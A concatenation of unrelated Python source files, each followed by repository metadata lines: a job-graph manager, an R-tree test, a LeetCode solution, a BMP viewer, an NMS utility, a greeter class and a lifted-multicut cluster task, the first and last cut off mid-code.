self._setup_starting_jobs(ran_tasks, next_tasks)
else:
self._add_initial_pending_job(taskid)
logger.info("Resuming at task %s", taskid)
def _fill_available_resources(self):
"""
Ensure there are enough starting resources in order every job
can run at some point
"""
for job in self.jobs_graph.keys():
for required_resources in self.__tasks[job].get_required_resources():
for resource, req_amount in required_resources.items():
old_amount = self._available_resources.get(resource, 0)
if old_amount < req_amount:
logger.info("Increasing available resources count for %r"
" from %r to %r. Old value was not enough"
" for job %r to run.",
resource, old_amount, req_amount, job)
self._available_resources[resource] = req_amount
def get_job(self, job, pop=False):
if job not in self.jobs_graph:
self.argparser.error('Invalid job: %s. Available jobs: %s' % (job, repr(self.jobs_graph.keys())))
if pop:
return self.jobs_graph.pop(job)
return self.jobs_graph[job]
def _add_initial_pending_job(self, job):
wait_for = self.get_job(job).get('wait_for', [])
self._add_pending_job(job, wait_for=tuple(wait_for))
def _add_pending_job(self, job, wait_for=(), is_retry=False):
if job in self.args.skip_job:
return
if job in self.__tasks:
task = self.__tasks[job]
parallelization = task.get_parallel_jobs()
else:
task_id = self.get_job(job).get('origin', job)
task = self.__tasks[task_id]
parallelization = 1
if parallelization == 1:
self.__pending_jobs[job] = {
'wait_for': set(wait_for),
'is_retry': is_retry,
'wait_time': task.wait_time,
}
else:
# Split parallelized task into N parallel jobs.
basejobconf = self.get_job(job, pop=True)
for i in range(parallelization):
job_unit = "%s_%i" % (job, i)
job_unit_conf = deepcopy(basejobconf)
job_unit_conf['origin'] = job
job_unit_conf['index'] = i
for _, nextjobs in job_unit_conf.get('on_finish', {}).items():
if i != 0: # only job 0 will conserve finish targets
for nextjob in copy(nextjobs):
if nextjob != 'retry':
if nextjob in self.jobs_graph:
self.get_job(nextjob).setdefault('wait_for', []).append(job_unit)
if nextjob in self.__pending_jobs:
self.__pending_jobs[nextjob]['wait_for'].add(job_unit)
else:
for i in range(parallelization):
nextjobp = "%s_%i" % (job, i)
self.get_job(nextjobp).get('wait_for', []).append(job_unit)
if nextjobp in self.__pending_jobs:
self.__pending_jobs[nextjobp]['wait_for'].add(job_unit)
nextjobs.remove(nextjob)
self.jobs_graph[job_unit] = job_unit_conf
self.__pending_jobs[job_unit] = {
'wait_for': set(wait_for),
'is_retry': is_retry,
'origin': job,
'wait_time': task.wait_time,
}
for other, oconf in self.jobs_graph.items():
if job in oconf.get('wait_for', []):
oconf['wait_for'].remove(job)
if other in self.__pending_jobs:
self.__pending_jobs[other]['wait_for'].discard(job)
for i in range(parallelization):
job_unit = "%s_%i" % (job, i)
oconf['wait_for'].append(job_unit)
if other in self.__pending_jobs:
self.__pending_jobs[other]['wait_for'].add(job_unit)
def add_argparser_options(self):
super(GraphManager, self).add_argparser_options()
self.argparser.add_argument('--jobs-graph', help='Define jobs graph_dict on command line', default='{}')
self.argparser.add_argument('--starting-job', action='append', default=[],
help='Set starting jobs. Can be given multiple times.')
self.argparser.add_argument('--only-starting-jobs', action='store_true',
help='If given, only run the starting jobs (don\'t follow on finish next jobs)')
self.argparser.add_argument('--comment', help='Can be used for differentiate command line and avoid scheduling '
'fail when a graph manager job is scheduled when another one with same option '
'signature is running. Doesn\'t do anything else.')
self.argparser.add_argument('--skip-job', default=[], action='append',
help='Skip given job. Can be given multiple times. Also next jobs for the skipped'
'one will be skipped.')
self.argparser.add_argument('--resume-from-jobid', help='Resume from the given graph manager jobid')
def parse_args(self):
args = super(GraphManager, self).parse_args()
self.jobs_graph = yaml.load(args.jobs_graph) or deepcopy(self.jobs_graph)
if not self.name:
self.argparser.error('Manager name not set.')
return args
def workflow_loop(self):
logger.debug("Pending jobs: %r", self.__pending_jobs)
logger.debug("Running jobs: %r", self.__running_jobs)
logger.debug("Available resources: %r", self._available_resources)
logger.debug("Acquired resources: %r", self._acquired_resources)
self.check_running_jobs()
if self.__pending_jobs:
self.run_pending_jobs()
elif not self.__running_jobs:
return False
return True
def run_job(self, job, is_retry=False):
task = self.__tasks.get(job)
if task is not None:
return task.run(self, is_retry)
jobconf = self.get_job(job)
task = self.__tasks.get(jobconf['origin'])
if task is not None:
idx = jobconf['index']
return task.run(self, is_retry, index=idx)
def _must_wait_time(self, job):
status = self.__pending_jobs[job]
if status['wait_time'] is not None:
wait_time = status['wait_time'] - time() + self.__start_time[job]
if wait_time > 0:
logger.info("Job %s must wait %d seconds for running", job, wait_time)
return True
return False
def run_pending_jobs(self):
"""Try running pending jobs.
Normally, only jobs that have no outstanding dependencies are started.
If all pending jobs have outstanding dependencies, try to start one job
ignoring unknown tasks, i.e. those that are not currently pending.
If none of the pending jobs cannot be started either way, it means
there's a dependency cycle, in this case an error is raised.
"""
# Normal mode: start jobs without dependencies.
for job in sorted(self.__pending_jobs.keys()):
if len(self.__running_jobs) >= self.max_running_jobs:
break
status = self.__pending_jobs[job]
job_can_run = not status['wait_for'] and not self._must_wait_time(job) and self._try_acquire_resources(job)
if job_can_run:
try:
jobid = self.run_job(job, status['is_retry'])
except:
self._release_resources(job)
raise
self.__pending_jobs.pop(job)
self.__running_jobs[job] = jobid
if not self.__pending_jobs or self.__running_jobs or \
any(status['wait_time'] is not None for status in self.__pending_jobs.values()):
return
# At this point, there are pending jobs, but none were started because
# of dependencies, try "skip unknown deps" mode: start one job that
# only has "unseen" dependencies to try to break the "stalemate."
origin_job = None
for job in sorted(self.__pending_jobs.keys()):
if len(self.__running_jobs) >= self.max_running_jobs:
break
status = self.__pending_jobs[job]
job_can_run = (
all(w not in self.__pending_jobs for w in status['wait_for']) and
(not origin_job or status.get('origin') == origin_job) and
self._try_acquire_resources(job))
origin_job = status.get('origin')
if job_can_run:
try:
jobid = self.run_job(job, status['is_retry'])
except:
self._release_resources(job)
raise
self.__pending_jobs.pop(job)
self.__running_jobs[job] = jobid
if not origin_job and self.__running_jobs:
return
if self.__running_jobs:
return
# Nothing helped, all pending jobs wait for each other somehow.
raise RuntimeError("Job dependency cycle detected: %s" % ', '.join(
'%s waits for %s' % (
job, sorted(self.__pending_jobs[job]['wait_for']))
for job in sorted(self.__pending_jobs.keys())))
def check_running_jobs(self):
for job, jobid in list(self.__running_jobs.items()):
outcome = self.is_finished(jobid)
if outcome is not None:
logger.info('Job "%s/%s" (%s) finished', self.name, job, jobid)
for st in self.__pending_jobs.values():
st['wait_for'].discard(job)
for conf in self.jobs_graph.values():
if job in conf.get('wait_for', []):
conf['wait_for'].remove(job)
for nextjob in self._get_next_jobs(job, outcome):
if nextjob == 'retry':
jobconf = self.get_job(job)
retries = jobconf.get('retries', 0)
if retries > 0:
self._add_pending_job(job, is_retry=True)
jobconf['retries'] -= 1
logger.warning('Will retry job %s (outcome: %s, number of retries left: %s)',
job, outcome, jobconf['retries'])
elif nextjob in self.__pending_jobs:
logger.error('Job %s already pending', nextjob)
else:
wait_for = self.get_job(nextjob).get('wait_for', [])
self._add_pending_job(nextjob, wait_for)
self._release_resources(job)
self.__running_jobs.pop(job)
else:
logger.info("Job %s (%s) still running", job, jobid)
def _try_acquire_resources(self, job):
result = True
task_id = self.get_job(job).get('origin', job)
for required_resources in self.__tasks[task_id].get_required_resources(partial=True):
for resource, req_amount in required_resources.items():
if self._available_resources[resource] < req_amount:
result = False
break
else:
for resource, req_amount in required_resources.items():
self._available_resources[resource] -= req_amount
self._acquired_resources[resource].append((job, req_amount))
return True
return result
def _release_resources(self, job):
for res, acquired in self._acquired_resources.items():
for rjob, res_amount in acquired:
if rjob == job:
self._available_resources[res] += res_amount
self._acquired_resources[res].remove((rjob, res_amount))
def _get_next_jobs(self, job, outcome):
if self.args.only_starting_jobs:
return []
on_finish = self.get_job(job).get('on_finish', {})
if outcome in on_finish:
nextjobs = on_finish[outcome]
elif outcome in self.__failed_outcomes:
nextjobs = on_finish.get('failed', [])
else:
nextjobs = on_finish.get('default', [])
return nextjobs
@property
def pending_jobs(self):
return self.__pending_jobs
|
hermit-crab/shub-workflow
|
shub_workflow/graph/__init__.py
|
__init__.py
|
py
| 17,269 |
python
|
en
|
code
| null |
github-code
|
6
|
29250448134
|
from __future__ import annotations
import os
import unittest
from collections import defaultdict, namedtuple
from math import ceil
from typing import Any, Iterator
import numpy as np
from rtree.index import Index, Property, RT_TPRTree
class Cartesian(
namedtuple(
"Cartesian",
("id", "time", "x", "y", "x_vel", "y_vel", "update_time", "out_of_bounds"),
)
):
__slots__ = ()
def getX(self, t: float) -> float:
return self.x + self.x_vel * (t - self.time)
def getY(self, t: float) -> float:
return self.y + self.y_vel * (t - self.time)
def getXY(self, t: float) -> tuple[float, float]:
return self.getX(t), self.getY(t)
def get_coordinates(
self, t_now: float | None = None
) -> tuple[
tuple[float, float, float, float],
tuple[float, float, float, float],
float | tuple[float, float],
]:
return (
(self.x, self.y, self.x, self.y),
(self.x_vel, self.y_vel, self.x_vel, self.y_vel),
self.time if t_now is None else (self.time, t_now),
)
class QueryCartesian(
namedtuple("QueryCartesian", ("start_time", "end_time", "x", "y", "dx", "dy"))
):
__slots__ = ()
def get_coordinates(
self,
) -> tuple[
tuple[float, float, float, float],
tuple[float, float, float, float],
tuple[float, float],
]:
return (
(self.x - self.dx, self.y - self.dy, self.x + self.dx, self.y + self.dy),
(0, 0, 0, 0),
(self.start_time, self.end_time),
)
def data_generator(
dataset_size: int = 100,
simulation_length: int = 10,
max_update_interval: int = 20,
queries_per_time_step: int = 5,
min_query_extent: float = 0.05,
max_query_extent: float = 0.1,
horizon: int = 20,
min_query_interval: int = 2,
max_query_interval: int = 10,
agility: float = 0.01,
min_speed: float = 0.0025,
max_speed: float = 0.0166,
min_x: int = 0,
min_y: int = 0,
max_x: int = 1,
max_y: int = 1,
) -> Iterator[tuple[str, int, Any]]:
def create_object(
id_: float, time: float, x: float | None = None, y: float | None = None
) -> Cartesian:
# Create object with random or defined x, y and random velocity
if x is None:
x = np.random.uniform(min_x, max_x)
if y is None:
y = np.random.uniform(min_y, max_y)
speed = np.random.uniform(min_speed, max_speed)
angle = np.random.uniform(-np.pi, np.pi)
x_vel, y_vel = speed * np.cos(angle), speed * np.sin(angle)
# Set update time for when out of bounds, or max interval
for dt in range(1, max_update_interval + 1):
if not (0 < x + x_vel * dt < max_x and 0 < y + y_vel * dt < max_y):
out_of_bounds = True
update_time = time + dt
break
else:
out_of_bounds = False
update_time = time + max_update_interval
return Cartesian(id_, time, x, y, x_vel, y_vel, update_time, out_of_bounds)
objects = list()
objects_to_update = defaultdict(set)
for id_ in range(dataset_size):
object_ = create_object(id_, 0)
objects.append(object_)
objects_to_update[object_.update_time].add(object_)
yield "INSERT", 0, object_
for t_now in range(1, simulation_length):
need_to_update = ceil(dataset_size * agility)
updated_ids = set()
while need_to_update > 0 or objects_to_update[t_now]:
kill = False
if objects_to_update[t_now]:
object_ = objects_to_update[t_now].pop()
if object_ not in objects:
continue
kill = object_.out_of_bounds
else:
id_ = np.random.randint(0, dataset_size)
while id_ in updated_ids:
id_ = np.random.randint(0, dataset_size)
object_ = objects[id_]
updated_ids.add(object_.id)
need_to_update -= 1
yield "DELETE", t_now, object_
if kill:
x = y = None
else:
x, y = object_.getXY(t_now)
object_ = create_object(object_.id, t_now, x, y)
objects[object_.id] = object_
objects_to_update[object_.update_time].add(object_)
yield "INSERT", t_now, object_
for _ in range(queries_per_time_step):
x = np.random.uniform(min_x, max_x)
y = np.random.uniform(min_y, max_y)
dx = np.random.uniform(min_query_extent, max_query_extent)
dy = np.random.uniform(min_query_extent, max_query_extent)
dt = np.random.randint(min_query_interval, max_query_interval + 1)
t = np.random.randint(t_now, t_now + horizon - dt)
yield "QUERY", t_now, QueryCartesian(t, t + dt, x, y, dx, dy)
def intersects(
x1: float, y1: float, x2: float, y2: float, x: float, y: float, dx: float, dy: float
) -> bool:
# Checks if line from x1, y1 to x2, y2 intersects with rectangle with
# bottom left at x-dx, y-dy and top right at x+dx, y+dy.
# Implementation of https://stackoverflow.com/a/293052
# Check if line points not both more/less than max/min for each axis
if (
(x1 > x + dx and x2 > x + dx)
or (x1 < x - dx and x2 < x - dx)
or (y1 > y + dy and y2 > y + dy)
or (y1 < y - dy and y2 < y - dy)
):
return False
# Check on which side (+ve, -ve) of the line the rectangle corners are,
# returning True if any corner is on a different side.
calcs = (
(y2 - y1) * rect_x + (x1 - x2) * rect_y + (x2 * y1 - x1 * y2)
for rect_x, rect_y in (
(x - dx, y - dy),
(x + dx, y - dy),
(x - dx, y + dy),
(x + dx, y + dy),
)
)
sign = np.sign(next(calcs)) # First corner (bottom left)
return any(np.sign(calc) != sign for calc in calcs) # Check remaining 3
class TPRTests(unittest.TestCase):
def test_tpr(self) -> None:
# TODO : this freezes forever on some windows cloud builds
if os.name == "nt":
return
# Cartesians list for brute force
objects = dict()
tpr_tree = Index(properties=Property(type=RT_TPRTree))
for operation, t_now, object_ in data_generator():
if operation == "INSERT":
tpr_tree.insert(object_.id, object_.get_coordinates())
objects[object_.id] = object_
elif operation == "DELETE":
tpr_tree.delete(object_.id, object_.get_coordinates(t_now))
del objects[object_.id]
elif operation == "QUERY":
tree_intersect = set(tpr_tree.intersection(object_.get_coordinates()))
# Brute intersect
brute_intersect = set()
for tree_object in objects.values():
x_low, y_low = tree_object.getXY(object_.start_time)
x_high, y_high = tree_object.getXY(object_.end_time)
if intersects(
x_low,
y_low,
x_high,
y_high, # Line
object_.x,
object_.y,
object_.dx,
object_.dy,
): # Rect
brute_intersect.add(tree_object.id)
# Tree should match brute force approach
assert tree_intersect == brute_intersect
|
Toblerity/rtree
|
tests/test_tpr.py
|
test_tpr.py
|
py
| 7,681 |
python
|
en
|
code
| 573 |
github-code
|
6
|
48354201
|
from typing import *
import heapq
# TLE
# https://leetcode-cn.com/submissions/detail/292094052/testcase/
class Solution:
def busiestServers(self, k: int, arrival: List[int], load: List[int]) -> List[int]:
result = []
server_load = [0] * k
# 1 is available, 0 is busy
available_servers = [1] * k
task_end_heap = []
for i, a in enumerate(arrival):
# free the servers
while len(task_end_heap) > 0:
(end_time, server) = heapq.heappop(task_end_heap)
if end_time <= a:
available_servers[server] = 1
else:
heapq.heappush(task_end_heap, (end_time, server))
break
# assign the new request
server = i % k
if available_servers[server]:
available_servers[server] = 0
heapq.heappush(task_end_heap, (a + load[i], server))
server_load[server] += 1
else:
if sum(available_servers) == 0:
# all servers are busy
# drop the request
continue
j = (server + 1) % k
while j != server and not available_servers[j]:
j += 1
j %= k
server = j
if available_servers[server]:
available_servers[server] = 0
heapq.heappush(task_end_heap, (a + load[i], server))
server_load[server] += 1
else:
# drop the request
continue
max_load = max(server_load)
result = [i for i, x in enumerate(server_load) if x == max_load]
return result
if __name__ == "__main__":
s = Solution()
k = 3
arrival = [1,2,3,4,5]
load = [5,2,3,3,3]
result = s.busiestServers(k, arrival, load)
assert result == [1]
k = 3
arrival = [1,2,3,4]
load = [1,2,1,2]
result = s.busiestServers(k, arrival, load)
assert result == [0]
|
code-cp/leetcode
|
solutions/1606/main.py
|
main.py
|
py
| 2,144 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22354810782
|
from tkinter import ttk
import bitmap
from tkinter import Tk, mainloop, Canvas, PhotoImage, filedialog
def rgb2hex(r, g, b):
"""
Convert an r,g,b colour to a hex code
"""
return "#{:02x}{:02x}{:02x}".format(r, g, b)
class Root(Tk):
"""
This is the root object, which inherits from TK
The benefit of inheritance is we can write:
self.button instead of self.root.button
"""
def __init__(self):
super(Root, self).__init__()
self.title("BMP compression analyzer")
self.minsize(640, 400)
self.row = 3
self.labelFrame = ttk.LabelFrame(self, text="Open File")
self.labelFrame.grid(column=0, row=1, padx=20, pady=20)
self.button()
def get_row(self):
self.row += 1
return self.row
def button(self):
self.button = ttk.Button(
self.labelFrame, text="Browse A File", command=self.file_dialog
)
self.button.grid(column=1, row=1)
def file_dialog(self):
"""
Opens a file dialog and has the user chose a file
This then sets some labels afterwards
"""
self.filename = filedialog.askopenfilename(
initialdir="./", title="Select A File",
)
self.label = ttk.Label(self.labelFrame, text="")
self.label.grid(column=1, row=2)
self.label.configure(text=self.filename)
if self.filename:
self.get_bmp_info(self.filename)
def get_bmp_info(self, filename):
"""
Print some information about the bmp file
Shows on the UI bmp
"""
with open(filename, "rb") as bmp_file:
bmp_data = bitmap.Image(bmp_file.read())
self.show_image(
bmp_data.getBitmapWidth(),
bmp_data.getBitmapHeight(),
bmp_data.getPixels(),
self.get_row(),
0,
)
def show_image(self, width, height, pixels, row, col):
"""
Add an image to the gui
"""
self.canvas = Canvas(self, width=width, height=height)
self.canvas.grid(column=col, row=row)
img = PhotoImage(width=width, height=height)
self.canvas.create_image((width / 2, height / 2), image=img, state="normal")
self.canvas.image = img
for y_index, y in enumerate(pixels):
for x_index, x in enumerate(y):
blue, green, red = x
hex_code = rgb2hex(r=red, g=green, b=blue)
img.put(hex_code, (x_index, height - y_index))
if __name__ == "__main__":
root = Root()
root.mainloop()
|
SinaKhalili/bmp-compressor
|
main.py
|
main.py
|
py
| 2,646 |
python
|
en
|
code
| 0 |
github-code
|
6
|
4886937902
|
import numpy as np
import torch
def ious(box, boxes, isMin = False):#定义iou函数
box_area = (box[3] - box[1]) * (box[4] - box[2])#计算自信度最大框的面积
area = (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 4] - boxes[:, 2])#计算其他所有框的面积
xx1 = torch.max(box[1], boxes[:, 1])#计算交集左上角x的坐标其他同理
yy1 = torch.max(box[2], boxes[:, 2])
xx2 = torch.min(box[3], boxes[:, 3])
yy2 = torch.min(box[4], boxes[:, 4])
# w = torch.max(0, xx2 - xx1)
# h = torch.max(0, yy2 - yy1)#获取最大值也可以用下面这种方法
w = torch.clamp(xx2 - xx1, min=0)#获取最大值
h = torch.clamp(yy2 - yy1, min=0)
inter = w * h#计算交集面积
# ovr1 = inter/torch.min(box_area, area)
ovr2 = inter/ (box_area + area - inter)#交集面积/并集面积
# ovr = torch.max(ovr2,ovr1)
# if isMin:#用于判断是交集/并集,还是交集/最小面积(用于处理大框套小框的情况)
#
# ovr = inter / torch.min(box_area, area)
# else:
# ovr = inter / (box_area + area - inter)
return ovr2
def nms(boxes, thresh=0.5, isMin = True):#定义nms函数并传3个参数,分别是框,自信度阀值,是否最小面积
if boxes.shape[0] == 0:#获取框的个是看是否为0,为0没框就返回一个空的数组防止代码报错
return torch.Tensor([])
_boxes = boxes[(-boxes[:, 0]).argsort()]#对框进行排序按自信度从大到小的顺序
r_boxes = []#定义一个空的列表用来装合格的框
while _boxes.shape[0] > 1:#循环框的个数
a_box = _boxes[0]#取出第一个(自信度最大的框)框最为目标框与 其他框做iou
b_boxes = _boxes[1:]#取出剩下的所有框
r_boxes.append(a_box)#将第一个框添加到列表
# print(iou(a_box, b_boxes))
index = torch.where(ious(a_box, b_boxes,isMin) < thresh)#对框做iou将满足iou阀值条件的框留下并反回其索引
_boxes = b_boxes[index]#根据索引取框并赋值给_boxes,使其覆盖原来的_boxes
if _boxes.shape[0] > 0:#判断是否剩下最后一个框
r_boxes.append(_boxes[0])#将最后一个框,说明这是不同物体,并将其放进列表
return torch.stack(r_boxes)
if __name__ == '__main__':
# a = np.array([1,1,11,11])
# bs = np.array([[1,1,10,10],[11,11,20,20]])
# print(iou(a,bs))
bs = torch.tensor([[1, 1, 10, 10, 40,8], [1, 1, 9, 9, 10,9], [9, 8, 13, 20, 15,3], [6, 11, 18, 17, 13,2]])
# print(bs[:,3].argsort())
print(nms(bs))
|
RockingHorse-L/yolov3
|
YOLOV3/tool1.py
|
tool1.py
|
py
| 2,668 |
python
|
zh
|
code
| 2 |
github-code
|
6
|
37197760033
|
from datetime import datetime
class Greeter:
def __init__(self, name):
self.name = name
def day():
return datetime.now().strftime('%A')
def part_of_day(): # Определяет часть, дня основываясь на текущем часе
current_hour = datetime.now().hour
if current_hour < 12:
part_of_day = "утра"
elif 12 <= current_hour < 17:
part_of_day = 'дня'
else:
part_of_day = 'вечера'
return part_of_day
def greet(self, store): # Выводит приветствие, используя все расчетные составляющие
print(f'Здраствуйте, меня зовут {self.name}, и добро пожаловать'
f'в {store}!')
print(f'Желаем вам приятного {day()} {part_of_day()}')
print('Дарим вам купон на скидку 20%!')
|
alecksandr-slavin/git_work
|
stepick_v1/new.py
|
new.py
|
py
| 980 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
650322467
|
#! /bin/python
import os
import sys
import json
from concurrent import futures
import numpy as np
import vigra
import luigi
import z5py
import nifty
import nifty.tools as nt
import nifty.distributed as ndist
from elf.segmentation.lifted_multicut import get_lifted_multicut_solver
from elf.segmentation.multicut import get_multicut_solver
import cluster_tools.utils.volume_utils as vu
import cluster_tools.utils.function_utils as fu
from cluster_tools.cluster_tasks import SlurmTask, LocalTask, LSFTask
#
# Lifted Multicut Tasks
#
class SolveLiftedSubproblemsBase(luigi.Task):
""" SolveLiftedSubproblems base class
"""
task_name = 'solve_lifted_subproblems'
src_file = os.path.abspath(__file__)
# input volumes and graph
problem_path = luigi.Parameter()
lifted_prefix = luigi.Parameter()
scale = luigi.IntParameter()
#
dependency = luigi.TaskParameter()
def requires(self):
return self.dependency
def clean_up_for_retry(self, block_list):
super().clean_up_for_retry(block_list)
# TODO remove any output of failed blocks because it might be corrupted
@staticmethod
def default_task_config():
# we use this to get also get the common default config
config = LocalTask.default_task_config()
config.update({'agglomerator': 'kernighan-lin',
'time_limit_solver': None})
return config
def run_impl(self):
# get the global config and init configs
# shebang, block_shape, roi_begin, roi_end = self.global_config_values()
shebang, block_shape, roi_begin, roi_end, block_list_path\
= self.global_config_values(with_block_list_path=True)
self.init(shebang)
with vu.file_reader(self.problem_path, 'r') as f:
shape = tuple(f['s0/graph'].attrs['shape'])
factor = 2**self.scale
block_shape = tuple(bs * factor for bs in block_shape)
# update the config with input and graph paths and keys
# as well as block shape
config = self.get_task_config()
config.update({'problem_path': self.problem_path, 'scale': self.scale,
'block_shape': block_shape, 'lifted_prefix': self.lifted_prefix})
# make output datasets
out_key = 's%i/sub_results_lmc' % self.scale
with vu.file_reader(self.problem_path) as f:
out = f.require_group(out_key)
# NOTE, gzip may fail for very small inputs, so we use raw compression for now
# might be a good idea to give blosc a shot ...
out.require_dataset('cut_edge_ids', shape=shape, chunks=block_shape,
compression='raw', dtype='uint64')
out.require_dataset('node_result', shape=shape, chunks=block_shape,
compression='raw', dtype='uint64')
if self.n_retries == 0:
block_list = vu.blocks_in_volume(shape, block_shape, roi_begin, roi_end,
block_list_path)
else:
block_list = self.block_list
self.clean_up_for_retry(block_list)
n_jobs = min(len(block_list), self.max_jobs)
# prime and run the jobs
prefix = 's%i' % self.scale
self.prepare_jobs(n_jobs, block_list, config, prefix)
self.submit_jobs(n_jobs, prefix)
# wait till jobs finish and check for job success
self.wait_for_jobs()
self.check_jobs(n_jobs, prefix)
# part of the luigi API
def output(self):
return luigi.LocalTarget(os.path.join(self.tmp_folder,
self.task_name + '_s%i.log' % self.scale))
class SolveLiftedSubproblemsLocal(SolveLiftedSubproblemsBase, LocalTask):
""" SolveLiftedSubproblems on local machine
"""
pass
class SolveLiftedSubproblemsSlurm(SolveLiftedSubproblemsBase, SlurmTask):
""" SolveLiftedSubproblems on slurm cluster
"""
pass
class SolveLiftedSubproblemsLSF(SolveLiftedSubproblemsBase, LSFTask):
""" SolveLiftedSubproblems on lsf cluster
"""
pass
#
# Implementation
#
def _find_lifted_edges(lifted_uv_ids, node_list):
lifted_indices = np.arange(len(lifted_uv_ids), dtype='uint64')
# find overlap of node_list with u-edges
inner_us = np.in1d(lifted_uv_ids[:, 0], node_list)
inner_indices = lifted_indices[inner_us]
inner_uvs = lifted_uv_ids[inner_us]
# find overlap of node_list with v-edges
inner_vs = np.in1d(inner_uvs[:, 1], node_list)
return inner_indices[inner_vs]
def _solve_block_problem(block_id, graph, uv_ids, ds_nodes,
costs, lifted_uvs, lifted_costs,
lifted_solver, solver,
ignore_label, blocking, out, time_limit):
fu.log("Start processing block %i" % block_id)
# load the nodes in this sub-block and map them
# to our current node-labeling
chunk_id = blocking.blockGridPosition(block_id)
nodes = ds_nodes.read_chunk(chunk_id)
if nodes is None:
fu.log_block_success(block_id)
return
# if we have an ignore label, remove zero from the nodes
# (nodes are sorted, so it will always be at pos 0)
if ignore_label and nodes[0] == 0:
nodes = nodes[1:]
removed_ignore_label = True
if len(nodes) == 0:
fu.log_block_success(block_id)
return
else:
removed_ignore_label = False
# we allow for invalid nodes here,
# which can occur for un-connected graphs resulting from bad masks ...
inner_edges, outer_edges = graph.extractSubgraphFromNodes(nodes, allowInvalidNodes=True)
# if we only have no inner edges, return
# the outer edges as cut edges
if len(inner_edges) == 0:
if len(nodes) > 1:
assert removed_ignore_label,\
"Can only have trivial sub-graphs for more than one node if we removed ignore label"
cut_edge_ids = outer_edges
sub_result = None
fu.log("Block %i: has no inner edges" % block_id)
# otherwise solve the multicut for this block
else:
# find the lifted uv-ids that correspond to the inner edges
inner_lifted_edges = _find_lifted_edges(lifted_uvs, nodes)
fu.log("Block %i: Solving sub-block with %i nodes, %i edges and %i lifted edges" % (block_id,
len(nodes),
len(inner_edges),
len(inner_lifted_edges)))
sub_uvs = uv_ids[inner_edges]
# relabel the sub-nodes and associated uv-ids for more efficient processing
nodes_relabeled, max_id, mapping = vigra.analysis.relabelConsecutive(nodes,
start_label=0,
keep_zeros=False)
sub_uvs = nt.takeDict(mapping, sub_uvs)
n_local_nodes = max_id + 1
sub_graph = nifty.graph.undirectedGraph(n_local_nodes)
sub_graph.insertEdges(sub_uvs)
sub_costs = costs[inner_edges]
assert len(sub_costs) == sub_graph.numberOfEdges
# we only need to run lifted multicut if we have lifted edges in
# the subgraph
if len(inner_lifted_edges) > 0:
fu.log("Block %i: have lifted edges and use lifted multicut solver" % block_id)
sub_lifted_uvs = nt.takeDict(mapping, lifted_uvs[inner_lifted_edges])
sub_lifted_costs = lifted_costs[inner_lifted_edges]
# solve multicut and relabel the result
sub_result = lifted_solver(sub_graph, sub_costs, sub_lifted_uvs, sub_lifted_costs,
time_limit=time_limit)
# otherwise we run normal multicut
else:
fu.log("Block %i: don't have lifted edges and use multicut solver")
# solve multicut and relabel the result
sub_result = solver(sub_graph, sub_costs, time_limit=time_limit)
assert len(sub_result) == len(nodes), "%i, %i" % (len(sub_result), len(nodes))
sub_edgeresult = sub_result[sub_uvs[:, 0]] != sub_result[sub_uvs[:, 1]]
assert len(sub_edgeresult) == len(inner_edges)
cut_edge_ids = inner_edges[sub_edgeresult]
cut_edge_ids = np.concatenate([cut_edge_ids, outer_edges])
_, res_max_id, _ = vigra.analysis.relabelConsecutive(sub_result, start_label=1,
keep_zeros=False,
out=sub_result)
fu.log("Block %i: Subresult has %i unique ids" % (block_id, res_max_id))
# IMPORTANT !!!
# we can only add back the ignore label after getting the edge-result !!!
if removed_ignore_label:
sub_result = np.concatenate((np.zeros(1, dtype='uint64'),
sub_result))
# get chunk id of this block
block = blocking.getBlock(block_id)
chunk_id = tuple(beg // sh for beg, sh in zip(block.begin, blocking.blockShape))
# serialize the cut-edge-ids and the (local) node labeling
ds_edge_res = out['cut_edge_ids']
fu.log("Block %i: Serializing %i cut edges" % (block_id, len(cut_edge_ids)))
ds_edge_res.write_chunk(chunk_id, cut_edge_ids, True)
if sub_result is not None:
ds_node_res = out['node_result']
fu.log("Block %i: Serializing %i node results" % (block_id, len(sub_result)))
ds_node_res.write_chunk(chunk_id, sub_result, True)
fu.log_block_success(block_id)
def solve_lifted_subproblems(job_id, config_path):
fu.log("start processing job %i" % job_id)
fu.log("reading config from %s" % config_path)
# get the config
with open(config_path) as f:
config = json.load(f)
# input configs
problem_path = config['problem_path']
scale = config['scale']
block_shape = config['block_shape']
block_list = config['block_list']
lifted_prefix = config['lifted_prefix']
agglomerator_key = config['agglomerator']
time_limit = config.get('time_limit_solver', None)
n_threads = config.get('threads_per_job', 1)
fu.log("reading problem from %s" % problem_path)
problem = z5py.N5File(problem_path)
# load the costs
# NOTE we use different cost identifiers for multicut and lifted multicut
# in order to run both in the same n5-container.
# However, for scale level 0 the costs come from the CostsWorkflow and
# hence the identifier is identical
costs_key = 's%i/costs_lmc' % scale if scale > 0 else 's0/costs'
fu.log("reading costs from path in problem: %s" % costs_key)
ds = problem[costs_key]
ds.n_threads = n_threads
costs = ds[:]
# load the graph
# NOTE we use different graph identifiers for multicut and lifted multicut
# in order to run both in the same n5-container.
# However, for scale level 0 the graph comes from the GraphWorkflow and
# hence the identifier is identical
graph_key = 's%i/graph_lmc' % scale if scale > 0 else 's0/graph'
shape = problem[graph_key].attrs['shape']
fu.log("reading graph from path in problem: %s" % graph_key)
graph = ndist.Graph(problem_path, graph_key, numberOfThreads=n_threads)
uv_ids = graph.uvIds()
# check if the problem has an ignore-label
ignore_label = problem[graph_key].attrs['ignore_label']
fu.log("ignore label is %s" % ('true' if ignore_label else 'false'))
fu.log("using agglomerator %s" % agglomerator_key)
lifted_solver = get_lifted_multicut_solver(agglomerator_key)
# TODO enable different multicut agglomerator
solver = get_multicut_solver(agglomerator_key)
# load the lifted edges and costs
nh_key = 's%i/lifted_nh_%s' % (scale, lifted_prefix)
lifted_costs_key = 's%i/lifted_costs_%s' % (scale, lifted_prefix)
ds = problem[nh_key]
fu.log("reading lifted uvs")
ds.n_threads = n_threads
lifted_uvs = ds[:]
fu.log("reading lifted costs")
ds = problem[lifted_costs_key]
ds.n_threads = n_threads
lifted_costs = ds[:]
# the output group
out = problem['s%i/sub_results_lmc' % scale]
# NOTE we use different sub-graph identifiers for multicut and lifted multicut
# in order to run both in the same n5-container.
# However, for scale level 0 the sub-graphs come from the GraphWorkflow and
# are hence identical
sub_graph_identifier = 'sub_graphs' if scale == 0 else 'sub_graphs_lmc'
ds_nodes = problem['s%i/%s/nodes' % (scale, sub_graph_identifier)]
blocking = nt.blocking([0, 0, 0], shape, list(block_shape))
